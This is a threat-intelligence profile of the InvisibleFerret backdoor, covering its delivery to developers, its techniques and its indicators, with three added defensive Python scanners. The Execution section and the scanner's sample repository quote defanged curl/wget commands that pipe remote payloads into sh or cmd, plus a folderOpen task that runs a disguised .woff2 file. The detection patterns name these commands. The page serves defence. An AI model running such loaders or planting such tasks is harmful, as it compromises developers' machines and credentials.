InvisibleFerret
InvisibleFerret is a Python-based modular backdoor and infostealer used in DPRK-linked campaigns that target software developers, including Contagious Interview activity. Public reporting associates it with North Korea-aligned clusters tracked as Void Dokkaebi, Famous Chollima and DeceptiveDevelopment, and with broader Lazarus-linked operations. It is commonly delivered as a second-stage payload by BeaverTail and appears alongside OtterCookie in phased infection chains aimed at developers, especially cryptocurrency, Web3 and DeFi personnel. Delivery relies on fake recruiter lures, malicious coding assessments, trojanized repositories, malicious npm packages, abuse of VS Code tasks and malicious Git hooks.
The malware is cross-platform, affecting Windows, macOS and Linux. Recent variants reportedly moved from readable Python scripts to Cython-compiled native extension modules, distributed as .pyd files on Windows and .so files on macOS and launched by lightweight Python runtime scripts; the change hinders analysis and sidesteps defenses that key on script content.
Documented capabilities cover both information theft and remote control: theft of browser credentials and cookies, SSH keys, cloud credentials (AWS, Azure and GCP material), .env files and cryptocurrency wallet data, plus keylogging, hijacking of cryptocurrency addresses on the clipboard and file exfiltration. Collected data is staged in consolidated folders before exfiltration, and file uploads have been sent over HTTP to a "/Uploads" URI.
On macOS the malware has persisted through a LaunchAgent named "com.avatar.update.wake.plist". Reporting on one campaign also notes Windows persistence via the Run value HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NvidiaDriverUpdate and Linux persistence via ~/.config/autostart/*.desktop entries.
InvisibleFerret has also been reported to use an "adc" module that downloads or leverages the AnyDesk client for remote access, checking for C:/Program Files(x86)/AnyDesk/AnyDesk.exe on Windows. Infrastructure and indicators tied to delivery or campaign activity include precommit[.]vercel[.]app, nvidiasdk[.]fly[.]dev, and the IPs 95.216.37.186 and 95.164.17.24.
Groups observed using it
6 distinct threat actors attributed by public researchers.
The intrusion set, also tracked as Famous Chollima, has migrated its primary implant from readable Python scripts into compiled binaries; the revised InvisibleFerret payload is distributed as .pyd files on Windows and .so components on macOS.
The techniques allow the malware to run silently and deliver a multi-stage infection chain culminating in a persistent backdoor known as InvisibleFerret.
The malware is designed to download additional payloads, including a cross-platform Python backdoor codenamed InvisibleFerret.
The campaign targeted Web3 and decentralised finance (DeFi) developers globally via AI-generated fake job offers delivered through LinkedIn, using three interoperating malware families BeaverTail, OtterCookie, and InvisibleFerret in a phased infection chain that begins with a malicious coding assessment and culminates in full credential exfiltration and wallet drainage.
...BeaverTail, which is then used to drop a Python backdoor referred to as InvisibleFerret that can establish persistence on Windows, Linux, and macOS hosts.
Techniques & procedures
33 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
4 techniques
ClickFix, which tricks users into following bogus prompts such as fake CAPTCHAs, and then infects victims' computers with trojanized codebases during the fake interview process.
North Korea is doubling down on a familiar playbook by weaponizing trust in open-source software and developer workflows... this campaign weaponizes developer trust in open-source repositories and legitimate tools like Visual Studio Code.
MITRE ATT&CK T1195.002 — Supply Chain Compromise: Compromise Software Supply Chain
Attackers pose as cryptocurrency recruiters on LinkedIn, sending targets to seemingly legitimate GitHub repositories that contain hidden malware.
Execution
5 techniques
This iteration uses malicious .vscode/tasks.json configurations to trigger JavaScript payloads disguised as web font files (.woff2) whenever a target opens a repository in VS Code.
The malicious .githooks/pre-commit script is short... it's a thin loader that fingerprints the OS via uname -s, then curls or wgets a per-platform payload from precommit[.]vercel[.]app and pipes it straight into a shell or cmd.exe:
curl -s 'hxxps://precommit[.]vercel.app/settings/mac?flag=5' | sh
wget -qO- 'hxxps://precommit[.]vercel.app/settings/linux?flag=5' | sh
curl -s hxxps://precommit[.]vercel.app/settings/windows?flag=5 | cmd
The intrusion set, also tracked as Famous Chollima, has migrated its primary implant from readable Python scripts into compiled binaries... the revised InvisibleFerret payload distributes as .pyd files on Windows and .so components on macOS... the malicious framework generates a lightweight runtime script to launch the core implant.
Behind the scenes, however, hidden task automation scripts execute obfuscated malicious JavaScript the moment the project is opened.
They then tricked victims into cloning compromised repositories locally. As a result, the engineering workstations ran the malicious components seamlessly.
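The tasks.json trigger, the font-file disguise and the pre-commit hook loader quoted above are all things a defender can check for before a cloned repository is opened in an editor. The scanner below is an added example written for this page, not tooling from any of the cited reports and not code from the malware: it walks a checkout, parses .vscode/tasks.json (JSON with comments), flags tasks that run on folderOpen or hand a non-script file to an interpreter, flags hook scripts that fingerprint the OS and pipe a download into a shell, and verifies that every .woff/.woff2 file actually begins with a WOFF signature. The sample checkout it builds in a temporary directory is constructed for the demonstration; the only page-derived string in it is the defanged precommit[.]vercel.app URL, and the interpreter and file-extension patterns are the author's assumptions.

```python
"""Pre-open hygiene check for a cloned repository (added example, reads only)."""
import json
import os
import re
import tempfile

FONT_MAGICS = (b"wOFF", b"wOF2")  # WOFF 1.0 / WOFF 2.0 file signatures
# download piped into an interpreter: curl ... | sh, wget -qO- ... | bash, ... | cmd
PIPE_TO_SHELL = re.compile(
    r"\b(?:curl|wget|Invoke-WebRequest|iwr)\b[^|\n]*\|\s*(?:sh|bash|zsh|cmd|powershell|iex)\b", re.I)
FINGERPRINT = re.compile(r"\buname\s+-s\b")
NON_SCRIPT_FILE = re.compile(r"\.(?:woff2?|ttf|otf|png|jpg|svg|ico)\b", re.I)
INTERPRETER = re.compile(r"\b(?:node|sh|bash|cmd|powershell|python3?)\b", re.I)


def _load_jsonc(text):
    """tasks.json is JSON-with-comments; strip comments and trailing commas first."""
    text = re.sub(r"/\*.*?\*/", "", text, flags=re.S)
    text = re.sub(r"^\s*//.*$", "", text, flags=re.M)
    text = re.sub(r",(\s*[}\]])", r"\1", text)
    return json.loads(text)


def scan_tasks_json(text):
    """Findings for tasks that auto-run on folder open or feed an odd file to an interpreter."""
    findings = []
    try:
        tasks = _load_jsonc(text).get("tasks", [])
    except (ValueError, AttributeError):
        return ["tasks.json: unparseable, inspect manually"]
    for task in tasks:
        label = task.get("label", "<unnamed>")
        cmd = " ".join([str(task.get("command", ""))] + [str(a) for a in task.get("args", [])])
        if (task.get("runOptions") or {}).get("runOn") == "folderOpen":
            findings.append(f"tasks.json: task '{label}' runs automatically on folderOpen: {cmd}")
        if NON_SCRIPT_FILE.search(cmd) and INTERPRETER.search(cmd):
            findings.append(f"tasks.json: task '{label}' feeds a non-script file to an interpreter: {cmd}")
        if PIPE_TO_SHELL.search(cmd):
            findings.append(f"tasks.json: task '{label}' pipes a download into a shell: {cmd}")
    return findings


def scan_hook(text, name="hook"):
    """Findings for a Git hook that behaves like the thin loader described above."""
    findings = []
    if PIPE_TO_SHELL.search(text):
        findings.append(f"{name}: downloads a payload and pipes it into a shell")
    if FINGERPRINT.search(text) and re.search(r"\b(?:curl|wget)\b", text):
        findings.append(f"{name}: fingerprints the OS with uname -s and fetches a per-platform payload")
    return findings


def font_is_masqueraded(header):
    """True when a .woff/.woff2 file lacks the WOFF signature (e.g. it is really JavaScript)."""
    return not header.startswith(FONT_MAGICS)


def scan_repo(root):
    """Walk a checkout and apply the three checks; returns a list of finding strings."""
    findings = []
    for dirpath, _dirs, filenames in os.walk(root):
        for fn in filenames:
            path = os.path.join(dirpath, fn)
            rel = os.path.relpath(path, root)
            parts = rel.split(os.sep)
            if parts[-2:] == [".vscode", "tasks.json"]:
                with open(path, encoding="utf-8", errors="replace") as f:
                    findings += scan_tasks_json(f.read())
            elif ".githooks" in parts or parts[:2] == [".git", "hooks"]:
                with open(path, encoding="utf-8", errors="replace") as f:
                    findings += scan_hook(f.read(), rel)
            elif fn.lower().endswith((".woff", ".woff2")):
                with open(path, "rb") as f:
                    if font_is_masqueraded(f.read(4)):
                        findings.append(f"{rel}: claims to be a web font but has no WOFF header")
    return findings


# Constructed sample checkout for the demonstration (not a real campaign repository).
SAMPLE_REPO = {
    ".vscode/tasks.json": b"""{
  // harmless-looking build task that actually fires on folder open
  "version": "2.0.0",
  "tasks": [
    {"label": "build", "type": "shell",
     "command": "node", "args": ["assets/fonts/icon.woff2"],
     "runOptions": {"runOn": "folderOpen"}},
  ]
}""",
    "assets/fonts/icon.woff2": b"(function(){ /* javascript, not a font */ })();",
    "assets/fonts/real.woff2": b"wOF2" + b"\x00" * 12,
    ".githooks/pre-commit": b"""#!/bin/sh
case "$(uname -s)" in
  Darwin) curl -s 'hxxps://precommit[.]vercel.app/settings/mac?flag=5' | sh ;;
  Linux)  wget -qO- 'hxxps://precommit[.]vercel.app/settings/linux?flag=5' | sh ;;
esac
""",
    "README.md": b"# demo\n",
}


def demo():
    """Materialise SAMPLE_REPO in a temporary directory, scan it, return the findings."""
    with tempfile.TemporaryDirectory() as root:
        for rel, data in SAMPLE_REPO.items():
            path = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "wb") as f:
                f.write(data)
        return scan_repo(root)


if __name__ == "__main__":
    import sys
    for line in (scan_repo(sys.argv[1]) if len(sys.argv) > 1 else demo()):
        print(line)
```

Run it as python3 scanner.py <checkout> before opening a repository; scan_repo is the entry point and demo() only exercises the constructed sample. The signature check is a cheap filter rather than proof: a real font that fails it is rare, but a JavaScript payload renamed .woff2 will never pass it, which is exactly the case the tasks.json trick depends on.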
Persistence
8 techniques
Contagious Interview has also utilized a plist file located in /Library/LaunchAgents to enable a malicious bash script the ability to persist.
Examples include APT3 placing scripts in the startup folder, APT32 using Run keys to execute PowerShell and VBS scripts, TA2541 placing VBS files in the Startup folder, TeamTNT adding batch scripts to the startup folder, and Smoke Loader adding a script in the Startup folder to deploy the payload.
This iteration uses malicious .vscode/tasks.json configurations to trigger JavaScript payloads disguised as web font files (.woff2) whenever a target opens a repository in VS Code.
Bundlore can persist via a LaunchAgent. Calisto adds a .plist file to the /Library/LaunchAgents folder to maintain persistence. CoinTicker creates user launch agents named .espl.plist and com.apple.[random string].plist to establish persistence.
MITRE ATT&CK T1546.016 — Event Triggered Execution: Installer Packages
Once launched, the malware uses a multi-stage loader to establish persistence across Windows, macOS, and Linux.
Multiple entries describe creating .lnk shortcuts in Startup folders, such as BACKSPACE creating a shortcut to itself in the CSIDL_STARTUP directory and DarkGate creating an LNK object in the victim startup folder.
Tracked reporting repeatedly describes malware and threat actors establishing persistence by adding values under HKCU/HKLM\Software\Microsoft\Windows\CurrentVersion\Run or RunOnce, and by placing executables, scripts, .lnk files, or .bat files in the Windows Startup folder.
The content repeatedly notes creation of '.lnk shortcut' files in the Startup folder, such as BACKSPACE creating a shortcut in CSIDL_STARTUP, DarkGate creating an LNK object in the victim startup folder, and Operation Dream Job placing LNK files into victims' startup folder.
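The three persistence locations reported for InvisibleFerret in the overview (the LaunchAgent name, the Run value and ~/.config/autostart) are easy to check by exact name, but a renamed variant would slip past a name-only check. The triage below is an added example for this page, not code from the cited reports: it pairs the exact names with a generic heuristic (an interpreter launching a script from a hidden or temporary user-writable directory) and works on artefact contents, so it can run over a collected triage package as well as a live host. The plist, .desktop file and Run values it examines are constructed; the interpreter and path patterns are the author's assumptions about what a malicious entry looks like, not a list taken from the reporting.

```python
"""Persistence triage for the macOS, Linux and Windows locations reported above (added example)."""
import plistlib
import re

# Names reported for this family in the overview above.
KNOWN_LAUNCH_AGENT = "com.avatar.update.wake.plist"
KNOWN_RUN_VALUE = "NvidiaDriverUpdate"

# Heuristic patterns: assumptions about what a malicious entry looks like, not from the reporting.
INTERPRETER = re.compile(
    r"(?:^|[\\/\s])(?:python[0-9.]*|bash|sh|zsh|node|osascript|cmd|powershell)(?:\.exe)?(?=\s|$)", re.I)
USER_WRITABLE = re.compile(
    r"(?:/tmp/|/var/tmp/|/Users/[^/\s]+/\.|/home/[^/\s]+/\.|\\AppData\\|\\Temp\\|%APPDATA%|%TEMP%|%LOCALAPPDATA%)",
    re.I)


def suspicious_command(cmdline):
    """Reason string when an interpreter runs something from a hidden/temp user path, else None."""
    if INTERPRETER.search(cmdline) and USER_WRITABLE.search(cmdline):
        return f"interpreter launched from user-writable path: {cmdline}"
    return None


def check_launch_agent(filename, plist_bytes):
    """macOS: ~/Library/LaunchAgents/*.plist and /Library/LaunchAgents/*.plist."""
    findings = []
    if filename == KNOWN_LAUNCH_AGENT:
        findings.append(f"{filename}: LaunchAgent name reported for InvisibleFerret")
    try:
        plist = plistlib.loads(plist_bytes)
    except Exception:  # a malformed plist in this directory is itself worth a look
        return findings + [f"{filename}: unparseable plist"]
    argv = plist.get("ProgramArguments") or [plist.get("Program", "")]
    reason = suspicious_command(" ".join(str(a) for a in argv))
    if reason:
        flags = ", ".join(k for k in ("RunAtLoad", "KeepAlive") if plist.get(k))
        findings.append(f"{filename}: {reason}" + (f" [{flags}]" if flags else ""))
    return findings


def check_autostart_desktop(filename, text):
    """Linux: ~/.config/autostart/*.desktop; the Exec= line is what runs at login."""
    match = re.search(r"^Exec=(.*)$", text, re.M)
    reason = suspicious_command(match.group(1).strip()) if match else None
    return [f"{filename}: {reason}"] if reason else []


def check_run_value(value_name, value_data):
    """Windows: values under HKCU/HKLM ...\\CurrentVersion\\Run (value name -> command line)."""
    findings = []
    if value_name == KNOWN_RUN_VALUE:
        findings.append(f"Run\\{value_name}: value name reported for InvisibleFerret")
    reason = suspicious_command(value_data)
    if reason:
        findings.append(f"Run\\{value_name}: {reason}")
    return findings


# Constructed sample artefacts for the demonstration (not captured from a real host).
SAMPLE_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.avatar.update.wake</string>
  <key>ProgramArguments</key><array>
    <string>/bin/bash</string><string>/Users/dev/.local/.wake.sh</string>
  </array>
  <key>RunAtLoad</key><true/>
</dict></plist>"""
SAMPLE_BENIGN_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.updater</string>
  <key>ProgramArguments</key><array><string>/Applications/Example.app/Contents/MacOS/updater</string></array>
</dict></plist>"""
SAMPLE_DESKTOP = "[Desktop Entry]\nType=Application\nName=Update\nExec=/usr/bin/python3 /home/dev/.config/.update/n.py\nHidden=false\n"
SAMPLE_RUN_VALUES = {
    "NvidiaDriverUpdate": r"C:\Windows\System32\cmd.exe /c python C:\Users\dev\AppData\Local\Temp\u.py",
    "OneDrive": r"C:\Users\dev\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background",
}


def demo():
    """Run every check over the constructed samples and return the findings."""
    findings = []
    findings += check_launch_agent("com.avatar.update.wake.plist", SAMPLE_PLIST)
    findings += check_launch_agent("com.example.updater.plist", SAMPLE_BENIGN_PLIST)
    findings += check_autostart_desktop("update.desktop", SAMPLE_DESKTOP)
    for name, data in SAMPLE_RUN_VALUES.items():
        findings += check_run_value(name, data)
    return findings


if __name__ == "__main__":
    for line in demo():
        print(line)
```

On a live host, feed it the files under ~/Library/LaunchAgents and /Library/LaunchAgents, ~/.config/autostart, and the Run/RunOnce values exported with reg query or Get-ItemProperty. Anything flagged only by the heuristic needs the script it points at pulled and read before a verdict; a benign updater living under AppData is not flagged because the heuristic requires an interpreter as well as the path.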
Privilege Escalation
8 techniques: the LaunchAgent, Run key, Startup folder, installer-package and VS Code tasks.json entries listed under Persistence; ATT&CK maps those same sub-techniques to this tactic as well.
Stealth
3 techniques
Tracked reporting repeatedly describes payloads, strings, configuration files, scripts, URLs, and binaries being obfuscated or encoded using Base64, XOR, RC4, AES, RSA, hex encoding, custom algorithms, and other methods across many malware families and threat actors.
This iteration uses malicious .vscode/tasks.json configurations to trigger JavaScript payloads disguised as web font files (.woff2).
Tracked reporting repeatedly describes malware and threat actors decoding, decrypting, or deobfuscating payloads, strings, configuration data, commands, and C2 traffic prior to execution or use, e.g., 'APT28 macro uses the command certutil -decode to decode contents of a .txt file storing the base64 encoded payload' and 'Action RAT can use Base64 to decode actor-controlled C2 server communications.'
Credential Access
2 techniques
The final payload, InvisibleFerret, is a Python-based backdoor that can steal credentials from more than a dozen crypto wallet extensions... as well as harvest browser credentials, log keystrokes, and hijack cryptocurrency addresses in the clipboard.
The final payload... can steal credentials from more than a dozen crypto wallet extensions, including MetaMask, Phantom, and Coinbase Wallet, as well as harvest browser credentials...
Discovery
4 techniques
"InvisibleFerret has also queried the victim device using Python scripts to obtain the User and Hostname" and "Pikabot performs a variety of system checks and gathers system information, including commands such as whoami."
Tracked reporting repeatedly describes malware and threat actors obtaining lists of running processes, using utilities such as tasklist, ps, WMI, Get-Process, CreateToolhelp32Snapshot, EnumProcesses, and similar APIs/commands to enumerate active processes on victim systems.
Tracked reporting repeatedly describes malware and threat actors collecting host details such as OS version, hostname, architecture, CPU, memory, BIOS, domain, language, and other configuration data; e.g., "APT41 uses multiple built-in commands such as systeminfo and net config Workstation to enumerate victim system basic configuration information."
BADNEWS crawls the victim's local drives and collects documents with selected extensions; Machete searches the file system for files of interest; Rover searches for files on local drives based on a predefined list of file extensions.
Collection
4 techniques
Tracked reporting repeatedly describes threat actors and malware collecting, stealing, identifying, copying, or staging files, documents, credentials, logs, databases, and other information from compromised hosts or local systems.
The final payload, InvisibleFerret, is a Python-based backdoor that can steal credentials from more than a dozen crypto wallet extensions... as well as harvest browser credentials, log keystrokes, and hijack cryptocurrency addresses in the clipboard.
Tracked reporting repeatedly describes adversaries and malware storing collected data, command output, credentials, archives, or files in local temporary folders, working directories, hidden directories, registry locations, recycle bins, or specific files prior to exfiltration.
The final payload... can steal credentials... log keystrokes, and hijack cryptocurrency addresses in the clipboard.
Command and Control
4 techniques
Although IP addresses and port numbers can be extracted from the Cython binaries through binary analysis, the runtime Python execution scripts could override these values with different C&C destinations passed as command-line arguments.
Tracked reporting repeatedly describes threat actors, malware, and campaigns using HTTP and/or HTTPS for command and control, including examples such as BlackEnergy communicating with C2 over HTTP POST requests and many other families using HTTP/S for C2.
BeaverTail is known to be used by North Korean attackers for information theft and downloading additional payloads... The use of Curl for downloading and the names of the downloaded files, “p.zi” and “p2.zip”, are known behaviors of BeaverTail... downloading additional malware like InvisibleFerret.
InvisibleFerret is a Python-based modular malware with information-stealing capabilities. It also provides remote control to attackers.
Exfiltration
1 technique
ADVSTORESHELL exfiltrates data over the same channel used for C2... Agrius exfiltrated staged data using tools such as Putty and WinSCP, communicating with command and control servers... numerous malware and groups sent victim data, files, credentials, or host information over existing C2 channels.
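The Command and Control and Exfiltration entries above, together with the overview, give three network behaviours worth a rule (HTTP POST to a /Uploads path, requests to the infrastructure named on this page, and curl or wget fetches of the p.zi and p2.zip archive names tied to BeaverTail) and one process behaviour (a runtime script that takes its C2 destination from the command line). The triage below is an added example for this page, not detection content from Mallory or from any vendor: the HTTP and process events are constructed, uploads.example.com is an assumed allowlist entry, and the user-writable path and interpreter patterns are the author's assumptions rather than anything from the reporting.

```python
"""Network and process triage for the C2, delivery and exfiltration behaviours above (added example)."""
import ipaddress
import re

# Infrastructure named on this page, with defanging removed.
IOC_HOSTS = {"precommit.vercel.app", "nvidiasdk.fly.dev", "95.216.37.186", "95.164.17.24"}
BEAVERTAIL_ARCHIVES = {"p.zi", "p2.zip"}
# Assumed: hosts this organisation legitimately posts uploads to.
UPLOAD_ALLOWLIST = {"uploads.example.com"}

IPV4 = re.compile(r"(?<![\d.])(?:\d{1,3}\.){3}\d{1,3}(?![\d.])")
USER_WRITABLE = re.compile(r"(?:/tmp/|/Users/[^/\s]+/\.|/home/[^/\s]+/\.|\\AppData\\|\\Temp\\)", re.I)
PYTHON = re.compile(r"(?:^|[\\/\s])python(?:[0-9.]*|w)(?:\.exe)?(?=\s|$)", re.I)


def _is_ip(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def triage_http(event):
    """Rule hits for one HTTP event dict with host, method, path, ua and bytes_out."""
    hits = []
    host = event.get("host", "").lower()
    path = event.get("path", "")
    if host in IOC_HOSTS:
        hits.append(f"known indicator: {host}")
    # The /Uploads rule keys on the path plus an IP-literal or unknown host, not on the IOC IPs,
    # because the runtime scripts can override the compiled-in destinations.
    if event.get("method") == "POST" and path.rstrip("/").lower().endswith("/uploads") \
            and (_is_ip(host) or host not in UPLOAD_ALLOWLIST):
        hits.append(f"POST to /Uploads on {host} ({event.get('bytes_out', 0)} bytes out)")
    ua = event.get("ua", "").lower()
    filename = path.rsplit("/", 1)[-1]
    if ua.startswith(("curl/", "wget/")) and filename in BEAVERTAIL_ARCHIVES:
        hits.append(f"{ua.split('/')[0]} fetch of {filename} (BeaverTail stage download)")
    return hits


def triage_process(event):
    """Rule hits for one process-creation event dict with image and cmdline."""
    cmd = event.get("cmdline", "")
    if not (PYTHON.search(event.get("image", "")) or PYTHON.search(cmd)):
        return []
    hits = []
    ips = [ip for ip in IPV4.findall(cmd) if _is_ip(ip)]
    if ips and USER_WRITABLE.search(cmd):
        hits.append(f"python script from user-writable path with C2-like arguments {ips}")
    if re.search(r"\.(?:pyd|so)\b", cmd, re.I) and "site-packages" not in cmd.lower():
        hits.append("compiled extension module referenced outside site-packages")
    hits += [f"known indicator on command line: {ip}" for ip in ips if ip in IOC_HOSTS]
    return hits


# Constructed events for the demonstration (not from a real incident).
HTTP_EVENTS = [
    {"host": "95.216.37.186", "method": "POST", "path": "/Uploads", "ua": "python-requests/2.31.0", "bytes_out": 5242880},
    {"host": "uploads.example.com", "method": "POST", "path": "/api/uploads", "ua": "Mozilla/5.0", "bytes_out": 2048},
    {"host": "precommit.vercel.app", "method": "GET", "path": "/settings/mac", "ua": "curl/8.4.0", "bytes_out": 0},
    {"host": "cdn.example.net", "method": "GET", "path": "/files/p2.zip", "ua": "curl/8.4.0", "bytes_out": 0},
    {"host": "registry.npmjs.org", "method": "GET", "path": "/lodash", "ua": "npm/10.2.0", "bytes_out": 0},
]
PROCESS_EVENTS = [
    {"image": r"C:\Python312\python.exe", "cmdline": r"python.exe C:\Users\dev\AppData\Roaming\.n\run.py 95.164.17.24 443"},
    {"image": "/usr/bin/python3", "cmdline": "python3 -m pytest tests/"},
    {"image": "/usr/bin/python3", "cmdline": "python3 /Users/dev/.cache/.w/main.py 203.0.113.10 8080"},
]


def demo():
    """Apply both rule sets to the constructed events; returns (http_hits, process_hits) keyed by index."""
    http = {i: triage_http(e) for i, e in enumerate(HTTP_EVENTS)}
    proc = {i: triage_process(e) for i, e in enumerate(PROCESS_EVENTS)}
    return http, proc


if __name__ == "__main__":
    for kind, hits in zip(("http", "process"), demo()):
        for index, rules in hits.items():
            for rule in rules:
                print(f"{kind}[{index}]: {rule}")
```

The allowlisted POST to /api/uploads shows why the path rule needs the host condition: an internal file service would otherwise page on every upload. The IOC match is kept as a second, independent hit so a known address still surfaces when the path differs, and the process rule fires on the argument pattern even for the documentation-range address in the third event, which is the point given that operators can pass new destinations without rebuilding the implant.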
IOCs tracked for this family
164 indicators attributed across vendor reports, sandbox runs, and researcher write-ups.
Recent activity
119 sources tracked across advisories, community write-ups, and news.
A primary implant/backdoor used by Void Dokkaebi/Famous Chollima that has shifted from Python scripts to compiled Cython-based extension modules on Windows and macOS to evade script-based detection and support command-and-control flexibility.
Referenced as malware analyzed by Trend Micro and associated in the post with Void Dokkaebi.
A backdoor and persistence layer in the same operation, providing interactive operator access, shell sessions, file transfers, and persistence.
A Python backdoor deployed by BeaverTail that steals cryptocurrency wallets and browser credentials.